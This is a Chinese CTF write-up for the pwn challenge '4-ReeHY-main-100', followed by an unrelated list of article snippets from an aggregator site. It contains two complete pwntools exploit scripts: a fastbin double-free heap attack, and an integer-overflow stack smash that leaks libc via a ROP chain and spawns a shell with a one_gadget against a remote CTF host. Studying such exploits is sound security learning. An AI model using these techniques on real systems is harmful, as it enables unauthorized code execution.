pipixia233333
pipixia233333

4-ReeHY-main-100 一道题学到了很多的知识

先说一下参考链接 https://bbs.pediy.com/thread-218300.htm

然后这个题 其实可以按堆的解法来做 也可以按照 栈的解法来做 这个要看自己的做法了

然后我首先看的是堆的解法 一开始我的想法是 直接 double free直接 到 heap_user 但是失败了

然后看了这篇帖子感觉受益匪浅 然后写篇这个帖子来记录一下

4-ReeHY-main-100 一道题学到了很多的知识_第1张图片

然后 那篇帖子其实讲的很明白 我就不多讲了  利用的就是 linux 里面的堆的机制  然后 让 hp[2].addr = (&hp[0]+8)

 

然后直接 就可以 操控了 。。。 下面是我参考上面链接 写的脚本

#coding:utf-8
from pwn import *
context.log_level='debug'


io=process("./4-ReeHY-main")
elf=ELF("./4-ReeHY-main")
libc=ELF("./libc-2.23.so")
'''


'''
def add(size,cun,content):
	io.recvuntil('******************************\n')
	io.sendline('1')
	io.recvuntil('Input size\n')
	io.sendline(str(size))
	io.recvuntil('Input cun\n')
	io.sendline(str(cun))
	io.recvuntil("Input content\n")
	io.sendline(content)

def dele(cun):
	io.recvuntil('******************************\n')
	io.sendline('2')
	io.recvuntil("Chose one to dele\n")
	io.sendline(str(cun))

def edit(cun,content):
	io.recvuntil('******************************\n')
	io.sendline('3')
	io.recvuntil('Chose one to edit\n')
	io.sendline(str(cun))
	io.recvuntil('Input the content\n')
	io.sendline(content)

def init(content):
	io.recvuntil('Input your name: \n')
	io.sendline(content)
if __name__ =="__main__":
	init('pipixia')
	add(0x30,0,'aaaa')
	add(0x30,1,'bbbb')
	#add(0x30,2,'cccc')
	dele(0)
	dele(1)
	dele(0)
	fake_chunk_addr=0x6020C2-8
	add(0x30,0,p64(fake_chunk_addr))
	add(0x30,1,'bbbb')
	add(0x30,0,'cccc')
	#gdb.attach(io)
	add(0x30,2,'dddd')
	#gdb.attach(io)
	io.interactive()
	io.close()

然后下面就是 非预期解法  大概思路就是

  1. 整数溢出绕过绕过size检查进行栈溢出
  2. 栈溢出leak掉libc
  3. 栈溢出实行one_gadget拿到shell

 

下面是脚本

#coding:utf-8
from pwn import *
#context.log_level='debug'
native=1
if native==1 :
    io=process('./4-ReeHY-main')
    libc=ELF('/home/keer/桌面/glibc-2.19/glibc-2.19/_debug/lib/libc-2.19.so')
    libc_one_gadget_addr=0xcf89a
else :
    io=remote('111.198.29.45',51162)
    libc=ELF('./libc-2.23.so')
    libc_one_gadget_addr=0x45216
elf=ELF('./4-ReeHY-main')

io.sendlineafter('$ ','1234')

def add(a,b,c):
    io.sendlineafter('$ ','1')
    io.sendlineafter('Input size\n',str(a))
    io.sendlineafter('Input cun\n',str(b))
    io.sendlineafter('Input content',c)
pop_rdi=0x400da3
main_addr=0x400c8c

add(-1,1,'a'*0x88+'\x00'*0x8+'a'*0x8+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main_addr))

io.recv()
puts_addr=u64(io.recv()[:6].ljust(8,'\x00'))
log.success('puts_addr:'+hex(puts_addr))
libc_base=puts_addr-libc.symbols['puts']
one_gadget_addr=libc_base+libc_one_gadget_addr
log.success('libc_base:'+hex(libc_base))
log.success('one_gadget_addr:'+hex(one_gadget_addr))
io.sendline('1234')
add(-1,1,'a'*0x88+'\x00'*0x8+'a'*0x8+p64(one_gadget_addr))

io.interactive()

 

你可能感兴趣的:(栈溢出,堆溢出)

  • 【c++基础概念深度理解——堆和栈的区别,并实现堆溢出和栈溢出】 XWWW668899 C++基本概念c++c语言开发语言青少年编程
    文章目录概要技术名词解释栈溢出和堆溢出小结概要学习C++语言,避免不了要好好理解一下堆(Heap)和栈(Stack),有助于更好地管理内存,以及如何写出一段程序“成功实现”堆溢出和栈溢出。技术名词解释理解东西最快的方式是根据自己目前能理解的词语去关联新的概念,不断的纠正,向正确的深度理解靠近,当无限接近的时候也就理解了想要理解的概念。我们经常说堆栈,把这两个名词放到一起。其实,堆是堆,栈是栈,两种
  • hackcon ctf 2018 | pwn wp fantasy_learner
    BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点,得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出,输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久,卡在了能否根据_d
  • 每日一题 day 08 lhsnhs 蓝桥杯职场和发展
    1>递归次数过多,栈溢出emmclassSolution{publicdoublemyPow(doublex,intn){doubleans=1.0;if(n使用快速幂
  • 单片机开发过程中经常会遇到什么问题? 好好学习的不知名程序员 学习单片机
    开发过程中经常遇到的问题包括数值异常、动作异常以及程序崩溃等。具体如下:1.数值异常问题及其解决方法数组越界:数组越界是一种常见的问题,当数组的索引超出了其实际范围时,可能会导致相邻变量的值被错误地修改。解决这类问题通常需要结合内存映射文件(map文件),通过分析map文件找到可能的不安全代码,并将其修正为安全代码。例如,确保对数组的访问都在有效的索引范围内。栈溢出:栈溢出也是数值异常的一个典型例
  • classA cla= ...; if(&cla == nullptr) 这种写法是否安全 kfhj c++
    在C++中,classAcla=…;这行代码创建了一个名为cla的classA类型的对象(假设classA是一个已经定义好的类)。这个对象cla是在栈上分配的,而不是在堆上。因此,&cla(即cla的地址)永远不会是nullptr。在C++中,栈上分配的对象(如局部变量)的地址总是有效的,除非程序遇到了未定义行为(比如栈溢出等极端情况,但这通常不是由正常编程引起的)。因此,if(&cla==nul
  • 堆栈溢出的原因 木小同 面试jvmjava内存溢出jvm优化内存泄漏
    堆和栈在JVM内存模型中,存在这样几个内存结构,主要是堆和栈。堆:JVM运行中产生变量的实际存储地址栈:每一个线程都会对应一个方法栈,主要存储线程运行时声明的变量,栈的大小取决去这个线程运行的深度堆溢出当创建对象时,没有足够的可用空间,则会发生堆溢出。java.lang.OutOfMemoryError:Javaheapspace堆内存空间不足,一种是真的不够,还有一种是发生了死循环,对象一直在创
  • c和JAVA的安全编码_C、C++ 和 Java安全编码实践提示与技巧 humphry huang c和JAVA的安全编码
    文/GwynFisher对于所有类型环境中的开发人员来说,安全性正成为一个越来越重要的主题,即便过去一直认为安全性不成问题的嵌入式系统也是如此。本文将介绍几种类型的编码漏洞,指出漏洞是什么、如何降低代码被攻击的风险、如何更好地找出代码中的此类缺陷。注入攻击通过将信息注入正在运行的流程,攻击者可以危害进程的运行状态,以反射到开发人员无法保护的某种最终目标。例如,攻击者可能会通过堆栈溢出(stackc
  • vue 循环 递归组件_vue2 递归组件--树形 weixin_39650091 vue循环递归组件
    递归组件,官方给的教程太简便了,根本看不出到底怎么用。于是自己查网摸索了一下,这儿只把核心思想写出来。效果如下图,点击后打开二级菜单,再点击后打开三级。//js//引子//思想:当v-if=‘false’时,循环时进行的。所以一开始就设置为false。ggg:{name:'gs',template:`我是p标签//这儿show必须要初始值为false,不然就是堆栈溢出,死循环。//这个是循环组件。
  • 深入剖析二进制漏洞:原理、类型与利用方法 天域网络科技 安全网络web安全
    目录引言1.1二进制漏洞简介1.2二进制漏洞的常见类型1.3二进制漏洞在CTF中的重要性缓冲区溢出2.1缓冲区溢出的基本原理2.2栈溢出攻击2.2.1EIP覆盖与ROP攻击2.2.2栈溢出的防御机制2.3堆溢出攻击2.3.1堆管理机制与漏洞利用2.3.2堆溢出的利用技巧格式化字符串漏洞3.1格式化字符串漏洞的原理3.2漏洞利用:信息泄露与任意写3.3格式化字符串漏洞的防御措施整数溢出4.1整数溢出
  • 深度剖析Java内存溢出:从堆到栈的全面解析 九转成圣 Java高频面试栏开发语言java后端jvm
    Java内存溢出是指在Java程序运行过程中,超出JVM分配的内存范围,导致内存不足的异常情况。本文将深入探讨Java内存溢出的各种类型,包括堆溢出、栈溢出、运行时常量池溢出、元空间溢出、直接内存溢出等,并提供详细的示例代码和技术解析。一、堆溢出(HeapOverflow)堆内存用于存储对象实例和数组。当持续创建新对象且无法及时回收内存时,会导致堆内存溢出。示例代码://设置JVM参数:-Xms2
  • C语言高手参考手册:函数进阶技巧 极客代码 玩转C语言开发语言c语言
    [大师C语言]合集[大师C语言(第一篇)]C语言栈溢出背后的秘密[大师C语言(第二十五篇)]C语言字符串探秘[大师C语言(第二篇)]C语言main函数背后的秘密[大师C语言(第二十六篇)]C语言结构体探秘[大师C语言(第三篇)]C语言函数参数背后的秘密[大师C语言(第二十七篇)]C语言联合体探秘[大师C语言(第四篇)]C语言段错误原理研究[大师C语言(第二十八篇)]C语言宏探秘[大师C语言(第五篇
  • 堆溢出 Use After Free(UAF) 无极921 网络安全网络安全web安全ctf
    在CTF(CaptureTheFlag)竞赛中,UseAfterFree(UAF)是一种常见的内存安全漏洞,它发生在程序对已经释放的内存进行访问或操作的时候。这种漏洞通常源于程序设计或实现中的错误,特别是当程序未能正确跟踪内存块的分配和释放状态时。下面详细解释UAF漏洞及其在CTF竞赛中的利用方式。UAF漏洞原理当一个内存块被释放后,它应该被标记为不可用,直到再次被分配。然而,如果程序在内存被释放
  • 安恒杯2018-pwn-over Sadmess
    framefaking正如这个技巧名字所说的那样,这个技巧就是构造一个虚假的栈帧来控制程序的执行流。原理概括地讲,我们在之前讲的栈溢出不外乎两种方式控制程序EIP控制程序EBP其最终都是控制程序的执行流。在framefaking中,我们所利用的技巧便是同时控制EBP与EIP,这样我们在控制程序执行流的同时,也改变程序栈帧的位置。一般来说其payload如下bufferpadding|fakeebp
  • 【LeetCode+JavaGuide打卡】Day14|144.二叉树的前序遍历、145.二叉树的后序遍历、94.二叉树的中序遍历 WhoAmI\ leetcode算法职场和发展
    学习目标:144.二叉树的前序遍历145.二叉树的后序遍历94.二叉树的中序遍历学习内容:递归遍历文章讲解确定递归函数的参数和返回值:确定哪些参数是递归的过程中需要处理的,那么就在递归函数里加上这个参数,并且还要明确每次递归的返回值是什么进而确定递归函数的返回类型。确定终止条件:写完了递归算法,运行的时候,经常会遇到栈溢出的错误,就是没写终止条件或者终止条件写的不对,操作系统也是用一个栈的结构来保
  • 父子树形结构(Stream+Lambda) A尘埃 树形结构StreamLambda
    两个类似的需求:返回组装好的部门树、返回组装好的地区信息树,最终都需要返回List集合对象给前端。一般来说完成这样的需求大多数人会想到递归,但递归的方式弊端过于明显:方法多次自调用效率很低、数据量大容易导致堆栈溢出、随着树深度的增加其时间复杂度会呈指数级增加等。一次数据库查询全部数据(几万条),其它全是内存操作、性能高;同时熟练使用stream流操作、Lambda表达式、Java地址引用,完成组装
  • QWB-2018-core | 栈溢出 goodcat666 pwn_cve_kernellinuxpwn
    题目分析core_writesigned__int64__fastcallcore_write(__int64a1,__int64a2,unsigned__int64a3){unsigned__int64v3;//rbxv3=a3;printk(&unk_215);if(v363){printk(&unk_2A1);result=0xFFFFFFFFLL;}else{result=0LL;qmem
  • 嵌入式软件工程师面试题(八) 嵌入式基地 牛客网嵌入式刷题专栏面试嵌入式面试面试题单片机can
    ✅作者简介:大家好我是:嵌入式基地,是一名嵌入式工程师,希望一起努力,一起进步!个人主页:嵌入式基地系列专栏:嵌入式习题专栏微信公众号:嵌入式基地嵌入式软件工程师面试题(八)1、在FreeRTOS中,任务通知的运行机制是怎么样的?2、什么情况下会栈溢出?如何避免?3、深复制和浅复制的区别?4、从一个源文件到可执行文件的过程?5、简述一下快速排序的步骤6、头文件的两种包含方式的区别,与""区别点击查
  • pwn学习笔记(3)ret2syscall 晓幂 学习笔记
    pwn学习笔记(3)ROP原理:ROP(ReturnOrientedProgramming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。栈溢出–ret2syscall:1.系统调用:对于一个已经存在于标准库中的函数,例如printf(),我们编写某个程序的时候,这个函数仅仅只用了printf(参数);这么一行,但是,其工作
  • ndk-stack使用及符号表还原 神迹12
    在android开发中,对于native产生的异常,很可能会产生闪退。对于ndk和native(c、c++)开发中,指针和内存管理是最重要也是最容易出问题的地方,稍有不慎就会遇到诸如内存地址访问错误、野针对、内存泄露、堆栈溢出、初始化错误、类型转换错误、数字除0等常见的问题。AndroidNDK安装包中提供了三个调试工具:addr2line、objdump和ndk-stack可用于native异常
  • 复习leetcode第二百三十一题:2的幂(C语言) 一个不知名程序员www leetcode
    注:本题不是必须使用递归的方法来求解的,同时,2的幂也可以用pow函数来代替;但笔者在此讲解会是在不用pow函数情况下,使用递归的方式本题使用递归时,首先考虑的是如何实现2的幂数,笔者在这边又再题目给的函数基础上,又自定义了一个长整型函数mi(这边的返回类型必须是longint,否则使用递归以后会由于返回值超过int字节大小的范围,出现栈溢出),然后在该函数中实现与pow函数相同功能的函数。lon
  • 代码随想录算法训练营第十四天|二叉树的递归遍历、二叉树的迭代遍历 前端花卷 代码随想录算法训练营算法数据结构javascript
    二叉树的理论基础参考资料(代码随想录)二叉树的递归遍历参考资料(代码随想录)思路递归算法的三个要素:确定递归函数的参数和返回值:确定哪些参数是递归的过程中需要处理的,那么就在递归函数里加上这个参数,并且还要明确每次递归的返回值是什么进而确定递归函数的返回类型。确定终止条件:写完了递归算法,运行的时候,经常会遇到栈溢出的错误,就是没写终止条件或者终止条件写的不对,操作系统也是用一个栈的结构来保存每一
  • vue导航前置守卫 ZOE^V1 vue
    堆栈溢出不知道为什么routers.beforeEach(async(to,from,next)=>{console.log('to',to)console.log('from',from)console.log('next',next)varuserinfo=store.state.user.userinfoconsole.log(userinfo.name)//----------------
  • golang信号处理 realPeanut
    信号是IPC之一,下面是常用的信号列表信号值动作说明SIGHUP1Term终端控制进程结束(终端连接断开)SIGINT2Term用户发送INTR字符(Ctrl+C)触发SIGQUIT3Core用户发送QUIT字符(Ctrl+/)触发SIGILL4Core非法指令(程序错误、试图执行数据段、栈溢出等)SIGABRT6Core调用abort函数触发SIGFPE8Core算术运行错误(浮点运算错误、除数
  • C语言一招教你搞定所有基础函数知识(中) 小陈从不会敲代码 C语言初阶c语言开发语言
    9.函数递归9.1递归的定义递归是什么?递就是递推,回就是回归,递推到结束,回归到开始,说白了就是函数自己调用自己,开始到结束调用,结束到开始调用。#includeintmain(){printf("hehe\n");main();//main函数中⼜调⽤了main函数return0;}这个代码只是为了演示递归的基本形式,不是为了解决问题,最终会栈溢出。9.2如何进行递归递归的时候就是把一个大问题
  • ARM PAC/BTI/MTE三剑客精讲与实战 安全二次方 博客目录导读ARM安全架构PAC指针认证BTI分支目标识别MTE内存标记扩展
    一、PAC指针认证精讲与实战思考1、什么是栈溢出攻击?什么是代码重用攻击?区别与联系?2、栈溢出攻击的软&硬件缓解技术有哪些?在TF-A&OPTEE上的应用?3、什么是ROP攻击?对ROP攻击的缓解技术?4、PAC下的ROP如何缓解?对返回地址的签名与验证?5、PAC的架构细节?硬件原理?PAC如何生成?如何检查?指令集?6、PAC如何启用?构建PAC的编译选项控制?7、PAC功能如何验证?PAC
  • C语言:函数递归 靡樊 c语言学习
    1.递归是什么?先来看最简单的递归代码:#includeintmain(){printf("HelloWorld\n");main();return0;}在main函数里还有一个main函数,在XXX函数里有XXX函数,这种就是递归在函数里调用自己,但这种情况会无限打印HelloWorld,最后导致栈溢出递归的递就是递推的意思,归就是回归的意思,上面的代码则是一直在递,没有归,所以导致栈溢出,所以
  • zer0pts-2020-memo:由文件偏移处理不正确--引发的堆溢出 goodcat666 pwn_cve_kernellinuxpwn
    启动脚本#!/bin/shqemu-system-x86_64\-m256M\-kernel./bzImage\-initrd./rootfs.cpio\-append"root=/dev/ramrwconsole=ttyS0oops=panicpanic=1kaslrquiet"\-cpukvm64,+smep,+smap\-monitor/dev/null\-nographic-enable-
  • “手把手教你玩转函数递归,建议收藏!“ 日月明之月 算法c语言c++开发语言
    目录1.什么是递归2.递归的限制条件3.递归的举例4.递归与迭代正⽂开始1.递归是什么?递归是学习C语⾔函数绕不开的⼀个话题,那什么是递归呢?递归其实是⼀种解决问题的⽅法,在C语⾔中,递归就是函数⾃⼰调⽤⾃⼰。写⼀个史上最简单的C语⾔递归代码:上述就是⼀个简单的递归程序,只不过上⾯的递归只是为了演⽰递归的基本形式,不是为了解决问题,代码最终也会陷⼊死递归(死循环),导致栈溢出。递归的思想:把⼀个⼤
  • C语言----函数递归(自我总结) Phospherus. c语言c++
    一.什么是递归?递归是学习C语⾔函数绕不开的⼀个话题!函数的递归:递归其实是⼀种解决问题的方法。在C语⾔中,递归就是函数自己调用自己。举例:写一个史上最简单函数递归的代码:此代码的运行结果如下:以上代码就是⼀个简单的递归程序,只不过上述代码不是为了解决问题,而是为了演示递归的基本形式,代码陷⼊了递归死循环,最终导致栈溢出(Stackoverflow)。递归的思想:把⼀个⼤型复杂问题层层转化为⼀个与
  • ESXi 勒索病毒ESXiArgs 其 CVE-2021-21974 漏洞分析 Songxwn VMware网络安全服务器
    个人博客https://songxwn.com介绍该漏洞编号为CVE-2021-21974,由OpenSLP服务中的堆溢出问题引起,未经身份验证的攻击者可以此进行低复杂度攻击。该漏洞主要影响6.x版和6.7、7.0版本之前的ESXi管理程序,2021年2月23日,VMware曾发布补丁修复了该漏洞。(在此之后发布的版本不影响)该漏洞启动之后,主要破坏行为为停止所有虚拟机,并加密所有数据文件。具体影
  • LeetCode[位运算] - #137 Single Number II Cwind javaAlgorithmLeetCode题解位运算
    原题链接:#137 Single Number II  要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现三次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间   难度:中等   分析: 与#136类似,都是考察位运算。不过出现两次的可以使用异或运算的特性 n XOR n = 0, n XOR 0 = n,即某一
  • 《JavaScript语言精粹》笔记 aijuans JavaScript
    0、JavaScript的简单数据类型包括数字、字符创、布尔值(true/false)、null和undefined值,其它值都是对象。 1、JavaScript只有一个数字类型,它在内部被表示为64位的浮点数。没有分离出整数,所以1和1.0的值相同。 2、NaN是一个数值,表示一个不能产生正常结果的运算结果。NaN不等于任何值,包括它本身。可以用函数isNaN(number)检测NaN,但是
  • 你应该更新的Java知识之常用程序库 Kai_Ge java
    在很多人眼中,Java 已经是一门垂垂老矣的语言,但并不妨碍 Java 世界依然在前进。如果你曾离开 Java,云游于其它世界,或是每日只在遗留代码中挣扎,或许是时候抬起头,看看老 Java 中的新东西。 Guava Guava[gwɑ:və],一句话,只要你做Java项目,就应该用Guava(Github)。 guava 是 Google 出品的一套 Java 核心库,在我看来,它甚至应该
  • HttpClient 120153216 httpclient
    /** * 可以传对象的请求转发,对象已流形式放入HTTP中 */ public static Object doPost(Map<String,Object> parmMap,String url) { Object object = null; HttpClient hc = new HttpClient(); String fullURL
  • Django model字段类型清单 2002wmj django
    Django 通过 models 实现数据库的创建、修改、删除等操作,本文为模型中一般常用的类型的清单,便于查询和使用: AutoField:一个自动递增的整型字段,添加记录时它会自动增长。你通常不需要直接使用这个字段;如果你不指定主键的话,系统会自动添加一个主键字段到你的model。(参阅自动主键字段) BooleanField:布尔字段,管理工具里会自动将其描述为checkbox。 Cha
  • 在SQLSERVER中查找消耗CPU最多的SQL 357029540 SQL Server
    返回消耗CPU数目最多的10条语句 SELECT TOP 10    total_worker_time/execution_count AS avg_cpu_cost, plan_handle,    execution_count,    (SELECT SUBSTRING(text, statement_start_of
  • Myeclipse项目无法部署,Undefined exploded archive location 7454103 eclipseMyEclipse
    做个备忘! 错误信息为:       Undefined exploded archive location 原因:           在工程转移过程中,导致工程的配置文件出错; 解决方法:    
  • GMT时间格式转换 adminjun GMT时间转换
    普通的时间转换问题我这里就不再罗嗦了,我想大家应该都会那种低级的转换问题吧,现在我向大家总结一下如何转换GMT时间格式,这种格式的转换方法网上还不是很多,所以有必要总结一下,也算给有需要的朋友一个小小的帮助啦。 1、可以使用 SimpleDateFormat SimpleDateFormat    EEE-三位星期 d-天 MMM-月 yyyy-四位年
  • Oracle数据库新装连接串问题 aijuans oracle数据库
    割接新装了数据库,客户端登陆无问题,apache/cgi-bin程序有问题,sqlnet.log日志如下: Fatal NI connect error 12170.   VERSION INFORMATION:         TNS for Linux: Version 10.2.0.4.0 - Product
  • 回顾java数组复制 ayaoxinchao java数组
    在写这篇文章之前,也看了一些别人写的,基本上都是大同小异。文章是对java数组复制基础知识的回顾,算是作为学习笔记,供以后自己翻阅。首先,简单想一下这个问题:为什么要复制数组?我的个人理解:在我们在利用一个数组时,在每一次使用,我们都希望它的值是初始值。这时我们就要对数组进行复制,以达到原始数组值的安全性。java数组复制大致分为3种方式:①for循环方式 ②clone方式 ③arrayCopy方
  • java web会话监听并使用spring注入 bewithme Java Web
            在java web应用中,当你想在建立会话或移除会话时,让系统做某些事情,比如说,统计在线用户,每当有用户登录时,或退出时,那么可以用下面这个监听器来监听。        import java.util.ArrayList; import java.ut
  • NoSQL数据库之Redis数据库管理(Redis的常用命令及高级应用) bijian1013 redis数据库NoSQL
    一 .Redis常用命令         Redis提供了丰富的命令对数据库和各种数据库类型进行操作,这些命令可以在Linux终端使用。         a.键值相关命令         b.服务器相关命令 1.键值相关命令       &
  • java枚举序列化问题 bingyingao java枚举序列化
    对象在网络中传输离不开序列化和反序列化。而如果序列化的对象中有枚举值就要特别注意一些发布兼容问题: 1.加一个枚举值 新机器代码读分布式缓存中老对象,没有问题,不会抛异常。 老机器代码读分布式缓存中新对像,反序列化会中断,所以在所有机器发布完成之前要避免出现新对象,或者提前让老机器拥有新增枚举的jar。 2.删一个枚举值 新机器代码读分布式缓存中老对象,反序列
  • 【Spark七十八】Spark Kyro序列化 bit1129 spark
    当使用SparkContext的saveAsObjectFile方法将对象序列化到文件,以及通过objectFile方法将对象从文件反序列出来的时候,Spark默认使用Java的序列化以及反序列化机制,通常情况下,这种序列化机制是很低效的,Spark支持使用Kyro作为对象的序列化和反序列化机制,序列化的速度比java更快,但是使用Kyro时要注意,Kyro目前还是有些bug。 Spark
  • Hybridizing OO and Functional Design bookjovi erlanghaskell
      推荐博文: Tell Above, and Ask Below - Hybridizing OO and Functional Design 文章中把OO和FP讲的深入透彻,里面把smalltalk和haskell作为典型的两种编程范式代表语言,此点本人极为同意,smalltalk可以说是最能体现OO设计的面向对象语言,smalltalk的作者Alan kay也是OO的最早先驱,
  • Java-Collections Framework学习与总结-HashMap BrokenDreams Collections
            开发中常常会用到这样一种数据结构,根据一个关键字,找到所需的信息。这个过程有点像查字典,拿到一个key,去字典表中查找对应的value。Java1.0版本提供了这样的类java.util.Dictionary(抽象类),基本上支持字典表的操作。后来引入了Map接口,更好的描述的这种数据结构。  &nb
  • 读《研磨设计模式》-代码笔记-职责链模式-Chain Of Responsibility bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 业务逻辑:项目经理只能处理500以下的费用申请,部门经理是1000,总经理不设限。简单起见,只同意“Tom”的申请 * bylijinnan */ abstract class Handler { /*
  • Android中启动外部程序 cherishLC android
    1、启动外部程序 引用自: http://blog.csdn.net/linxcool/article/details/7692374 //方法一 Intent intent=new Intent(); //包名 包名+类名(全路径) intent.setClassName("com.linxcool", "com.linxcool.PlaneActi
  • summary_keep_rate coollyj SUM
    BEGIN /*DECLARE minDate varchar(20) ; DECLARE maxDate varchar(20) ;*/ DECLARE stkDate varchar(20) ; DECLARE done int default -1; /* 游标中 注册服务器地址 */ DE
  • hadoop hdfs 添加数据目录出错 daizj hadoophdfs扩容
    由于原来配置的hadoop data目录快要用满了,故准备修改配置文件增加数据目录,以便扩容,但由于疏忽,把core-site.xml, hdfs-site.xml配置文件dfs.datanode.data.dir 配置项增加了配置目录,但未创建实际目录,重启datanode服务时,报如下错误: 2014-11-18 08:51:39,128 WARN org.apache.hadoop.h
  • grep 目录级联查找 dongwei_6688 grep
           在Mac或者Linux下使用grep进行文件内容查找时,如果给定的目标搜索路径是当前目录,那么它默认只搜索当前目录下的文件,而不会搜索其下面子目录中的文件内容,如果想级联搜索下级目录,需要使用一个“-r”参数: grep -n -r "GET" .   上面的命令将会找出当前目录“.”及当前目录中所有下级目录
  • yii 修改模块使用的布局文件 dcj3sjt126com yiilayouts
    方法一:yii模块默认使用系统当前的主题布局文件,如果在主配置文件中配置了主题比如: 'theme'=>'mythm', 那么yii的模块就使用 protected/themes/mythm/views/layouts 下的布局文件; 如果未配置主题,那么 yii的模块就使用  protected/views/layouts 下的布局文件, 总之默认不是使用自身目录 pr
  • 设计模式之单例模式 come_for_dream 设计模式单例模式懒汉式饿汉式双重检验锁失败无序写入
                    今天该来的面试还没来,这个店估计不会来电话了,安静下来写写博客也不错,没事翻了翻小易哥的博客甚至与大牛们之间的差距,基础知识不扎实建起来的楼再高也只能是危楼罢了,陈下心回归基础把以前学过的东西总结一下。   *********************************
  • 8、数组 豆豆咖啡 二维数组数组一维数组
      一、概念       数组是同一种类型数据的集合。其实数组就是一个容器。   二、好处       可以自动给数组中的元素从0开始编号,方便操作这些元素   三、格式   //一维数组 1,元素类型[] 变量名 = new 元素类型[元素的个数] int[] arr =
  • Decode Ways hcx2013 decode
    A message containing letters from A-Z is being encoded to numbers using the following mapping: 'A' -> 1 'B' -> 2 ... 'Z' -> 26 Given an encoded message containing digits, det
  • Spring4.1新特性——异步调度和事件机制的异常处理 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • squid3(高命中率)缓存服务器配置 liyonghui160com
        系统:centos 5.x   需要的软件:squid-3.0.STABLE25.tar.gz 1.下载squid wget http://www.squid-cache.org/Versions/v3/3.0/squid-3.0.STABLE25.tar.gz tar zxf squid-3.0.STABLE25.tar.gz &&
  • 避免Java应用中NullPointerException的技巧和最佳实践 pda158 java
    1) 从已知的String对象中调用equals()和equalsIgnoreCase()方法,而非未知对象。   总是从已知的非空String对象中调用equals()方法。因为equals()方法是对称的,调用a.equals(b)和调用b.equals(a)是完全相同的,这也是为什么程序员对于对象a和b这么不上心。如果调用者是空指针,这种调用可能导致一个空指针异常 Object unk
  • 如何在Swift语言中创建http请求 shoothao httpswift
    概述:本文通过实例从同步和异步两种方式上回答了”如何在Swift语言中创建http请求“的问题。 如果你对Objective-C比较了解的话,对于如何创建http请求你一定驾轻就熟了,而新语言Swift与其相比只有语法上的区别。但是,对才接触到这个崭新平台的初学者来说,他们仍然想知道“如何在Swift语言中创建http请求?”。 在这里,我将作出一些建议来回答上述问题。常见的
  • Spring事务的传播方式 uule spring事务
    传播方式:        新建事务       required       required_new   - 挂起当前         非事务方式运行       supports   &nbs
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他